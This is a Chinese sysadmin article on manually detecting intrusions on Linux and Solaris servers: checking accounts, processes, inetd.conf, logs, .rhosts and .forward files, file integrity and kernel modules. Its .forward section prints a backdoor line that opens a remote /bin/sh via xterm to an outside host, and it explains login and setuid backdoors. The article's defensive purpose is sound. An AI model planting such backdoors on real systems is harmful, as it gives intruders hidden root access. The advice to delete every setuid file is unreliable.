解析Linux如何判断自己的服务器是否被入侵的检测方法

马哥Linux运维 2018-01-13 10:27 次阅读

如何判断自己的服务器是否被入侵了呢?仅仅靠两只手是不够的,但两只手也能起到一些作用,我们先来看看UNIX系统上一些入侵检测方法,以LINUX和solaris为例。

1、检查系统密码文件

首先从明显的入手,查看一下passwd文件,ls –l /etc/passwd查看文件修改的日期。

检查一下passwd文件中有哪些特权用户,系统中uid为0的用户都会被显示出来。

解析Linux如何判断自己的服务器是否被入侵的检测方法

顺便再检查一下系统里有没有空口令帐户:

2、查看一下进程,看看有没有奇怪的进程

重点查看进程:

ps –aef | grep inetd

inetd是UNIX系统的守护进程,正常的inetd的pid都比较靠前,如果你看到输出了一个类似inetd –s /tmp/.xxx之类的进程,着重看inetd –s后面的内容。在正常情况下,LINUX系统中的inetd服务后面是没有-s参数的,当然也没有用inetd去启动某个文件;而solaris系统中也仅仅是inetd –s,同样没有用inetd去启动某个特定的文件;如果你使用ps命令看到inetd启动了某个文件,而你自己又没有用inetd启动这个文件,那就说明已经有人入侵了你的系统,并且以root权限起了一个简单的后门。

输入ps –aef 查看输出信息,尤其注意有没有以./xxx开头的进程。一旦发现异样的进程,经检查为入侵者留下的后门程序,立即运行kill –9 pid 开杀死该进程,然后再运行ps –aef查看该进程是否被杀死;一旦此类进程出现杀死以后又重新启动的现象,则证明系统被人放置了自动启动程序的脚本。这个时候要进行仔细查找:find / -name 程序名 –print,假设系统真的被入侵者放置了后门,根据找到的程序所在的目录,会找到很多有趣的东东J

UNIX下隐藏进程有的时候通过替换ps文件来做,检测这种方法涉及到检查文件完整性,稍后我们再讨论这种方法。接下来根据找到入侵者在服务器上的文件目录,一步一步进行追踪。

3、检查系统守护进程

检查/etc/inetd.conf文件,输入:cat /etc/inetd.conf | grep –v “^#”,输出的信息就是你这台机器所开启的远程服务。

一般入侵者可以通过直接替换in.xxx程序来创建一个后门,比如用/bin/sh 替换掉in.telnetd,然后重新启动inetd服务,那么telnet到服务器上的所有用户将不用输入用户名和密码而直接获得一个rootshell。

4、检查网络连接和监听端口

输入netstat -an,列出本机所有的连接和监听的端口,查看有没有非法连接。

输入netstat –rn,查看本机的路由、网关设置是否正确。

输入 ifconfig –a,查看网卡设置。

5、检查系统日志

命令last | more查看在正常情况下登录到本机的所有用户的历史记录。但last命令依赖于syslog进程,这已经成为入侵者攻击的重要目标。入侵者通常会停止系统的syslog,查看系统syslog进程的情况,判断syslog上次启动的时间是否正常,因为syslog是以root身份执行的,如果发现syslog被非法动过,那说明有重大的入侵事件。

在linux下输入ls –al /var/log

在solaris下输入 ls –al /var/adm

检查wtmp utmp,包括messgae等文件的完整性和修改时间是否正常,这也是手工擦除入侵痕迹的一种方法。

6、检查系统中的core文件

通过发送畸形请求来攻击服务器的某一服务来入侵系统是一种常规的入侵方法,典型的RPC攻击就是通过这种方式。这种方式有一定的成功率,也就是说它并不能100%保证成功入侵系统,而且通常会在服务器相应目录下产生core文件,全局查找系统中的core文件,输入find / -name core –exec ls –l {} \; 依据core所在的目录、查询core文件来判断是否有入侵行为。

7、.rhosts和.forward

这是两种比较著名的后门文件,如果想检查你的系统是否被入侵者安装了后门,不妨全局查找这两个文件:

find / -name “.rhosts” –print 

find / -name “.forward” –print 

在某用户的$HOME下,.rhosts文件中仅包含两个+号是非常危险的,如果你的系统上开了513端口(rlogin端口,和telnet作用相同),那么任意是谁都可以用这个用户登录到你的系统上而不需要任何验证。

Unix下在.forward文件里放入命令是重新获得访问的常用方法在某一 用户$HOME下的.forward可能设置如下:

\username|"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 –e /bin/sh" 

这种方法的变形包括改变系统的mail的别名文件(通常位于/etc/aliases). 注意这只是一种简单的变换. 更为高级的能够从.forward中运行简单脚本实现在标准输入执行任意命令(小部分预处理后).利用smrsh可以有效的制止这种后门(虽然如果允许可以自运行的elm's filter或procmail类程序, 很有可能还有问题。在Solaris系统下,如果你运行如下命令:

ln -s /var/mail/luser ~/.forward 

然后设置vacation有效,那么/var/mail/luser就会被拷贝到~/.forward,同时会附加"|/usr/bin/vacation me",旧的symlink被移到~/.forward..BACKUP中。直接删除掉这两个文件也可以。

8、检查系统文件完整性

检查文件的完整性有多种方法,通常我们通过输入ls –l 文件名来查询和比较文件,这种方法虽然简单,但还是有一定的实用性。但是如果ls文件都已经被替换了就比较麻烦。在LINUX下可以用rpm –V `rpm –qf 文件名` 来查询,国家查询的结果是否正常来判断文件是否完整。在LINUX下使用rpm来检查文件的完整性的方法也很多,这里不一一赘述,可以man rpm来获得更多的格式。

UNIX系统中,/bin/login是被入侵者经常替换作为后门的文件,接下来谈一下login后门 :

UNIX里,Login程序通常用来对telnet来的用户进行口令验证。入侵者获取login的源代码并修改,使它在比较输入口令与存储口令时先检查后门口令。如果用户敲入后门口令,它将忽视管理员设置的口令让你长驱直入:这将允许入侵者进入任何账号,甚至是root目录。由于后门口令是在用户真实登录并被日志记录到utmp和wtmP前产生的一个访问,所以入侵者可以登录获取shell却不会暴露该账号。管理员注意到这种后门后,使用”strings”命令搜索login程序以寻找文本信息。许多情况下后门口令会原形毕露。入侵者又会开始加密或者更改隐藏口令,使strings命令失效。所以许多管理员利用MD5校验和检测这种后门。UNIX系统中有md5sum命令,输入md5sum 文件名检查该文件的md5签名。它的使用格式如下:md5sum –b 使用二进制方式阅读文件;md5sum –c 逆向检查MD5签名;md5sum –t 使用文本方式阅读文件。

在前面提到过守护进程,对于守护进程配置文件inetd.conf中没有被注释掉的行要进行仔细比较,举个简单的例子,如果你开放了telnet服务,守护进程配置文件中就会有一句:telnet stream tcp nowait root /usr/sbin/in.telnetd in.telnetd

可以看到它所使用的文件是 /usr/sbin/in.telnetd,检查该文件的完整性,入侵者往往通过替换守护进程中允许的服务文件来为自己创建一个后门。

LINUX系统中的/etc/crontab也是经常被入侵者利用的一个文件,检查该文件的完整性,可以直接cat /etc/crontab,仔细阅读该文件有没有被入侵者利用来做其他的事情。

不替换login等文件而直接使用进程来启动后门的方法有一个缺陷,即系统一旦重新启动,这个进程就被杀死了,所以得让这个后门在系统启动的时候也启动起来。通常通过检查/etc/rc.d下的文件来查看系统启动的时候是不是带有后门程序;这个方法怎么有点象查windows下的trojan?

说到这里,另外提一下,如果在某一目录下发现有属性为这样的文件:-rwsr-xr-x 1 root root xxx .sh,这个表明任何用户进来以后运行这个文件都可以获得一个rootshell,这就是setuid文件。运行 find –perm 4000 –print对此类文件进行全局查找,然后删除这样的文件。

9、检查内核级后门

如果你的系统被人安装了这种后门,通常都是比较讨厌的,我常常就在想,遇到这种情况还是重新安装系统算了J,言归正传,首先,检查系统加载的模块,在LINUX系统下使用lsmod命令,在solaris系统下使用modinfo命令来查看。这里需要说明的是,一般默认安装的LINUX加载的模块都比较少,通常就是网卡的驱动;而solaris下就很多,没别的办法,只有一条一条地去分析。对内核进行加固后,应禁止插入或删除模块,从而保护系统的安全,否则入侵者将有可能再次对系统调用进行替换。我们可以通过替换create_module()和delete_module()来达到上述目的。

另外,对这个内核进行加固模块时应尽早进行,以防系统调用已经被入侵者替换。如果系统被加载了后门模块,但是在模块列表/proc/module里又看不到它们,有可能是使用了hack工具来移除加载的模块,大名鼎鼎的knark工具包就有移除加载模块的工具。出现这种情况,需要仔细查找/proc目录,根据查找到的文件和经验来判断被隐藏和伪装的进程。Knark后门模块就在/proc/knark目录,当然可能这个目录是隐藏的。

10、手工入侵检测的缺陷

上面谈了一些手工入侵检测的方法,但这些方式有一定的缺陷,有的甚至是不可避免的缺陷,这就是为什么说手工检测是“体力活”的原因。我们先来看看这些缺陷:

1)手工入侵检测只能基于主机,也就是说所有的入侵检测工作只能在操作系统下面完成,这是它固有的缺陷;基本上所有凌驾于操作系统之外的入侵行为统统无法探测得到。网络级的入侵,交换机、路由器上面的入侵和攻击行为,作为服务器的操作系统都无法得知;信息已经从主机发送出去了,如果在传送的介质当中被拦截,主机的操作系统是永远无动于衷的。

2)手工的入侵检测要求精通操作系统,并且漏洞库资料的刷新要快;在做一个网管的同时要做一个黑客。可以说经验的积累永远跟不上全世界漏洞资料的更新,难保系统不被新的漏洞所侵入。

3)手工入侵检测只是“就事论事”,根据发生的某一情况判断入侵事件,再作出相应的对应和防范措施,而无法预先根据入侵者的探测行为作出对攻击事件的描述,定义事件级别,在不防碍系统正常工作的情况下阻止下一步对系统的入侵行为。

4)可以通过手工入侵检测发现主机上的某些漏洞,进而作出相应的安全措施。但却避免不了一种现象:无法避免两个入侵者利用同一个漏洞攻击主机,即无法判断攻击模式来切断入侵行为。

5)综上所述,手工的入侵检测行为对于系统安全来说只是治标而不治本,多半还是依靠管理员的技巧和经验来增强系统的安全性,没有,也不可能形成真正的安全体系,虽然聊胜于无,可以检测和追踪到某些入侵行为,但如果碰上同样精通系统的入侵者就很难抓住踪迹了。

11、入侵检测系统的比较

搭建真正的安全体系需要入侵检测系统—IDS,一个优秀的入侵检测系统辅以系统管理员的技巧和经验可以形成真正的安全体系,有效判断和切断入侵行为,真正保护主机、资料。人们有时候会以为ISS的realsecure是优秀的入侵检测系统,其实不然,realsecure带有一定的缺陷,不谈它对事件的误报、漏报和错报,首先它是一个英文的软件,使用和熟悉起来有一定的难度。而且由于是外国人的软件,很多hack对realsecure有深入的研究,已经发掘出它的一些漏洞,甚至是固有漏洞,我就曾经测试出有的攻击手段可以令realsecure瘫痪。

再者,realsecure也是架设在服务器操作系统之上的,操作系统停止工作,同样令之停止工作,换句话说,很简单,攻击者攻击的目标往往就是realsecure本身。设想,假设你的系统依赖于入侵检测系统,而入侵检测系统被攻击者搞掉,那你的系统将大门敞开,任由出入,后果不堪设想。

马哥Linux运维 技术专区

原文标题:Linux如何判断自己的服务器是否被入侵

文章出处:【微信号:magedu-Linux,微信公众号:马哥Linux运维】欢迎添加关注!文章转载请注明出处。

关注电子发烧友微信

有趣有料的资讯及技术干货

下载发烧友APP

打造属于您的人脉电子圈

关注发烧友课堂

锁定最新课程活动及技术直播
收藏 人收藏
分享:

评论

相关推荐

一文教你如何在Linux上使用树莓派

赛普拉斯CY8CKIT-048 PSoC®模拟协处理器先锋套件可与PSoC Creator IDE轻....

的头像 Cypress 发表于 04-20 06:59 177次阅读
一文教你如何在Linux上使用树莓派

详解嵌入式Linux设备驱动篇module_init

linux就是这样做的,对只需要初始化运行一次的函数都加上__init属性。在kernel初始化后期....

的头像 嵌入式ARM 发表于 04-18 14:50 75次阅读
详解嵌入式Linux设备驱动篇module_init

29条运维工程师必须知道的基本的Linux命令来供你学习

如果你是一个新手,并尝试使用命令行接口,我们收集了各种基本的Linux命令来供你学习,帮你在各种Li....

的头像 马哥Linux运维 发表于 04-17 15:57 59次阅读
29条运维工程师必须知道的基本的Linux命令来供你学习

linux系统数字音频设备的OSS和ALSA驱动结构分析(完整代码)

目前,手机、PDA、MP3等许多嵌入式设备中包含了数字音频设备,一个典型的数字音频系统的电路组成如图....

发表于 04-16 11:18 30次阅读
linux系统数字音频设备的OSS和ALSA驱动结构分析(完整代码)

lcd驱动程序如何编写显示图片功能

LCD驱动我们只需要写硬件这一块的代码就可以了,下面有三个函数内核已经帮我们写好了,我们只需要调用就....

发表于 04-16 08:43 51次阅读
lcd驱动程序如何编写显示图片功能

btrfs:Linux中也终于有了一个可以和ZFS相媲美的文件系统

其次是数据一致性 (data integrity) 相关的特性。系统面临不可预料的硬件故障,Btrf....

的头像 Linuxer 发表于 04-15 10:59 488次阅读
btrfs:Linux中也终于有了一个可以和ZFS相媲美的文件系统

什么是 EDDP? EDDP适合哪些人?

你想用 Linux,但希望它不要影响电机驱动的确定性和响应时间;你想从驱动器中高速采集电流、电压和角....

发表于 04-13 16:48 75次阅读
什么是 EDDP? EDDP适合哪些人?

linux内核首选编码样式的文档

全世界有不同意见的人都认为此不一致的地方——好吧——很是缺乏一致性,不过只要是能正常思考的都知道《C....

的头像 嵌入式ARM 发表于 04-13 15:28 203次阅读
linux内核首选编码样式的文档

详解U-Boot引导内核分析

bootm命令是用来引导经过U-Boot的工具mkimage打包后的kernel image的。U-....

的头像 嵌入式ARM 发表于 04-13 15:22 164次阅读
详解U-Boot引导内核分析

Intel 80x86系列CPU保护模式下最核心的部件中几个寄存器的作用

ESI/EDI:存放主存操作数的全部/部分偏移量,也可存放16位操作数和结果,在多数情况功能可以互换....

的头像 嵌入式ARM 发表于 04-13 15:16 154次阅读
Intel 80x86系列CPU保护模式下最核心的部件中几个寄存器的作用

Linux下spi驱动技术分析

主设备对应SOC芯片中的SPI控制器,通常,一个SOC中可能存在多个SPI控制器,像上面的例子所示,....

发表于 04-12 17:59 83次阅读
Linux下spi驱动技术分析

浅谈TSS-5单板控制器的功能应用及MSP430的特性

PTN 是一种以面向连接的分组技术为内核,同时具备端到端的业务管理、层次化OAM及电信级保护等传送特....

发表于 04-12 11:05 53次阅读
浅谈TSS-5单板控制器的功能应用及MSP430的特性

10 个增加 UNIX/Linux Shell 脚本趣味的工具

制作 GUI 应用不是一项困难的任务,但需要时间和耐心。幸运的是,UNIX 和 Linux 都带有大....

的头像 Linux爱好者 发表于 04-11 16:21 161次阅读
10 个增加 UNIX/Linux Shell 脚本趣味的工具

【下载】《构建嵌入式LINUX系统(第二版)》

发表于 04-10 18:00 1097次阅读
【下载】《构建嵌入式LINUX系统(第二版)》

嵌入式Linux系统的7个重要模块

嵌入式Linux系统--命令行,即Shell是操作系统的重要部分,当然也包括嵌入式Linux系统。在....

的头像 嵌入式ARM 发表于 04-10 10:38 180次阅读
嵌入式Linux系统的7个重要模块

在嵌入式Linux上运行一个最简单的“Hello Liunx”程序

最后发现目标板支持FTP服务器,总数找到一个救命稻草,不过很可惜,用户密码未知,问了中间厂商,用户和....

的头像 嵌入式ARM 发表于 04-10 10:36 205次阅读
在嵌入式Linux上运行一个最简单的“Hello Liunx”程序

嵌入式音频系统设计(硬件:S3C2410+UDAl341软件:Linux2.4)

近几年, 嵌入式 数字音频产品受到越来越多消费者的青睐。在MP3、手机等消费类电子产品中,人们对于这....

发表于 04-09 09:56 61次阅读
嵌入式音频系统设计(硬件:S3C2410+UDAl341软件:Linux2.4)

嵌入式Linux内存管理的知识汇总

这个内存管理的知识点还真的需要我们专门的去理解一下,今天大家一起来学习学习嵌入式Linux内存管理的....

发表于 04-09 05:58 54次阅读
嵌入式Linux内存管理的知识汇总

linux驱动编写简单的开发步骤分享

我们今天所要说的是Linux驱动编写。现在Linux驱动比较流行,主要有几个方面的原因: 1)lin....

发表于 04-09 05:51 54次阅读
linux驱动编写简单的开发步骤分享

如何获得SMTP的服务器地址

本文开始介绍了SMTP的概念和SMTP工作过程,其次阐述了获得SMTP的服务器地址的方法,最后介绍了....

发表于 04-08 15:03 44次阅读
如何获得SMTP的服务器地址

如何搭建本地smtp服务器

本文开始阐述的阐述了搭建本地smtp服务器的教程,另外还介绍了基于CentOS搭建SMTP服务器的详....

发表于 04-08 14:46 22次阅读
如何搭建本地smtp服务器

读懂PetaLinux:让嵌入式Linux在它上面“跑”起来

PetaLinux为Zynq应用开发提供了有力的助推,“读”懂了TA,就可让Zynq去应对更多应用场....

的头像 安富利 发表于 04-08 14:41 740次阅读
读懂PetaLinux:让嵌入式Linux在它上面“跑”起来

normal worker_pool详细的创建过程代码分析

默认 work 是在 normal worker_pool 中处理的。系统的规划是每个 CPU 创建....

的头像 Linuxer 发表于 04-08 14:35 195次阅读
normal worker_pool详细的创建过程代码分析

smtp服务器是什么意思_smtp服务器怎么设置

本文开始介绍了smtp服务器的概念,其次阐述了smtp服务器的详细设置方法,最后介绍了常用邮箱SMT....

发表于 04-08 14:28 71次阅读
smtp服务器是什么意思_smtp服务器怎么设置

嵌入式学习的学习规划介绍

太多细节未说明,可根据实际情况调整。重点在于1、3,不必完全按照顺序作。对于学习c++,理由是c++....

的头像 EDN电子技术设计 发表于 04-06 19:09 194次阅读
嵌入式学习的学习规划介绍

一款随Linux内核代码维护的性能诊断工具

Perf Event 是一款随 Linux 内核代码一同发布和维护的性能诊断工具,由内核社区维护和发....

的头像 马哥Linux运维 发表于 04-06 09:23 1460次阅读
一款随Linux内核代码维护的性能诊断工具

方德浏览器挺好用的,推荐

发表于 04-03 17:08 328次阅读
方德浏览器挺好用的,推荐

对于刚入门ARM嵌入式的一些建议

对于学硬件的人而言,必须先对硬件的基本使用方法有感性的认识,更必须深刻认识该硬件的控制方式.

的头像 嵌入式资讯精选 发表于 04-03 11:36 336次阅读
对于刚入门ARM嵌入式的一些建议

考一考你!这三道嵌入式Linux题你会吗?来做一下吧

题一: 解释命令ls -a | more具体含义. 思考过后,再到下方寻找答案 题二: GCC -g....

的头像 嵌入式ARM 发表于 04-03 11:22 221次阅读
考一考你!这三道嵌入式Linux题你会吗?来做一下吧

Linux 及C语言高级开发

发表于 04-03 11:14 136次阅读
Linux 及C语言高级开发

Read系统调用在用户空间中的处理过程

0x80 中断处理程序接管执行后,先检察其系统调用号,然后根据系统调用号查找系统调用表,并从系统调用....

的头像 Linuxer 发表于 04-02 15:53 208次阅读
Read系统调用在用户空间中的处理过程

Windows和Linux,哪个更受人的青睐

尽管 Windows 和 Linux 目前存在核心差异。但是操作系统的选择很大程度上取决于非技术原因....

的头像 机器学习算法与人工智能 发表于 04-02 10:35 337次阅读
Windows和Linux,哪个更受人的青睐

学习嵌入式应用层开发的几大阶段

变成高手,你还要进一步学习内核和系统,内容包括计算机系统结构和汇编,linux内核编程,linux内....

的头像 21ic电子网 发表于 04-02 09:17 317次阅读
学习嵌入式应用层开发的几大阶段

Linux必备普及高并发场景LVS的实现过程

在集群系统中的服务器性能差异较大的情况下,调度器采用"加权最少链接"调度算法优化负载均衡性能,具有较....

的头像 马哥Linux运维 发表于 03-31 09:12 564次阅读
Linux必备普及高并发场景LVS的实现过程

Linux设备驱动程序与编写应用程序的本质区别

Linux驱动程序的开发与应用程序的开发有很大的区别。

的头像 嵌入式资讯精选 发表于 03-31 08:18 1098次阅读
Linux设备驱动程序与编写应用程序的本质区别

Linux内核模块介绍,使用Linux模块的优点

内核通过 printk() 输出的信息具有日志级别,日志级别是通过在 printk() 输出的字符串....

的头像 嵌入式单片机 发表于 03-30 15:53 269次阅读
Linux内核模块介绍,使用Linux模块的优点

基于Linux内存管理与Android内存分配机制

Android采取了一种有别于Linux的进程管理策略,有别于Linux的在进程活动停止后就结束该进....

的头像 Imagination Tech 发表于 03-30 14:52 379次阅读
基于Linux内存管理与Android内存分配机制

如在Linux上如何安装应用程序?

你的 Linux 发行版为其打包的软件提供了标准仓库,通常也有额外的仓库。例如,EPEL 服务于 R....

的头像 Linux爱好者 发表于 03-29 15:22 276次阅读
如在Linux上如何安装应用程序?

怎样在 Linux 上安装程序?

如何在 Linux 上安装应用程序?因为有许多操作系统,这个问题不止有一个答案。应用程序可以可以来自....

的头像 Linux爱好者 发表于 03-29 15:22 221次阅读
怎样在 Linux 上安装程序?

Linux C多线程编程之互斥锁与条件变量实例详解

死锁主要发生在有多个依赖锁存在时, 会在一个线程试图以与另一个线程相反顺序锁住互斥量时发生. 如何避....

的头像 嵌入式ARM 发表于 03-29 11:53 288次阅读
Linux C多线程编程之互斥锁与条件变量实例详解

一个嵌入式Linux开发程序员是如何成长为工程师的

从事嵌入式研发行业十年,认为学习就是要不断的吸纳知识,在研发过程中,经常会遇到一些问题,这种发现问题....

的头像 嵌入式资讯精选 发表于 03-29 11:35 384次阅读
一个嵌入式Linux开发程序员是如何成长为工程师的

Linux下有颜值够用的串口助手serials

发表于 03-28 23:48 284次阅读
Linux下有颜值够用的串口助手serials

拒绝开发板, 用 SkyEye 就可以模拟 ARM Linux!

对于希望学习 ARM 汇编的同学而言, 购买 ARM 开发板进行板上实测无疑是一个有效的方法,不过购....

的头像 嵌入式ARM 发表于 03-28 09:07 349次阅读
拒绝开发板, 用 SkyEye 就可以模拟 ARM Linux!

Linux操作复杂?这里有每个Linux开发者都应该知道的一些知识

作为现代操作系统的代表之一,Linux操作系统非常复杂,内部有多得令人眼花缭乱的各种组件在同步运行和....

的头像 嵌入式ARM 发表于 03-28 09:04 278次阅读
Linux操作复杂?这里有每个Linux开发者都应该知道的一些知识

du和df命令都是Linux系统的重要工具

虽然 du 和 df 命令有更多选项,但是这些例子可以让你初步了解。如果在这里找不到你要找的东西,那....

的头像 Linux爱好者 发表于 03-27 15:43 471次阅读
du和df命令都是Linux系统的重要工具

linux的命令行操作和shell的区别 / 服务器选购!

发表于 03-27 14:54 270次阅读
linux的命令行操作和shell的区别 / 服务器选购!

Linux资料汇总之内存管理

网络上面有很多坑爹的文章,坑了不少人,很多人对Linux的很多误解可能来自于这些广泛流传的技术文章。....

的头像 Linuxer 发表于 03-27 11:39 245次阅读
Linux资料汇总之内存管理

Linux内核的连续内存分配器(CMA)——避免预留大块内存

static const unsigned long size_bytes = CMA_SIZE_M....

的头像 Linuxer 发表于 03-27 11:07 279次阅读
Linux内核的连续内存分配器(CMA)——避免预留大块内存

Lumin OS、SDK和开发者端口的解读

在某一时刻,我们现在知道的Windows计算机是由MS-DOS操作系统组成的,Windows是一个在....

的头像 VR陀螺 发表于 03-26 16:58 576次阅读
Lumin OS、SDK和开发者端口的解读

2018年Linux运维必须抓住的前沿技能

Linux运维作为众多工作中需求人数最多,薪资待遇最高的岗位,本文重点介绍Linux运维的职业,本文....

的头像 马哥Linux运维 发表于 03-26 15:55 418次阅读
2018年Linux运维必须抓住的前沿技能

企业外部存储时代即将成为过去?

IDC对全球企业存储系统的市场追踪显示,尽管存储市场在2017年第四季度的年增长率达到了13.7%,....

的头像 存储D1net 发表于 03-26 11:10 333次阅读
企业外部存储时代即将成为过去?

介绍一款轻量级的Web服务器、反向代理服务器Nginx

所谓反向代理,很简单,其实就是在location这一段配置中的root替换成proxy_pass即可....

的头像 马哥Linux运维 发表于 03-26 10:36 376次阅读
介绍一款轻量级的Web服务器、反向代理服务器Nginx

对于网站 服务器的稳定直接影响网站排名

发表于 03-26 10:07 183次阅读
对于网站 服务器的稳定直接影响网站排名

Socket采用C/S模型进行设计的服务器模型

数据报套接字定义了一种无连接的服务。所谓无连接服务,简单来说,即在发送数据时,无需在收发两端建立类似....

的头像 嵌入式ARM 发表于 03-24 11:20 1296次阅读
Socket采用C/S模型进行设计的服务器模型

嵌入式Linux内存管理的一些知识点总结

发表于 03-24 09:31 290次阅读
嵌入式Linux内存管理的一些知识点总结

ESP8266如何实现与服务器的TCP通讯

发表于 03-22 11:28 853次阅读
ESP8266如何实现与服务器的TCP通讯

【转】基于嵌入式LINUX开发流程和步骤

发表于 03-19 21:15 379次阅读
【转】基于嵌入式LINUX开发流程和步骤

明远智睿MY-IMX6 系列评估板 Linux-3.14.52 驱动和设备

发表于 03-19 09:23 1020次阅读
明远智睿MY-IMX6 系列评估板 Linux-3.14.52 驱动和设备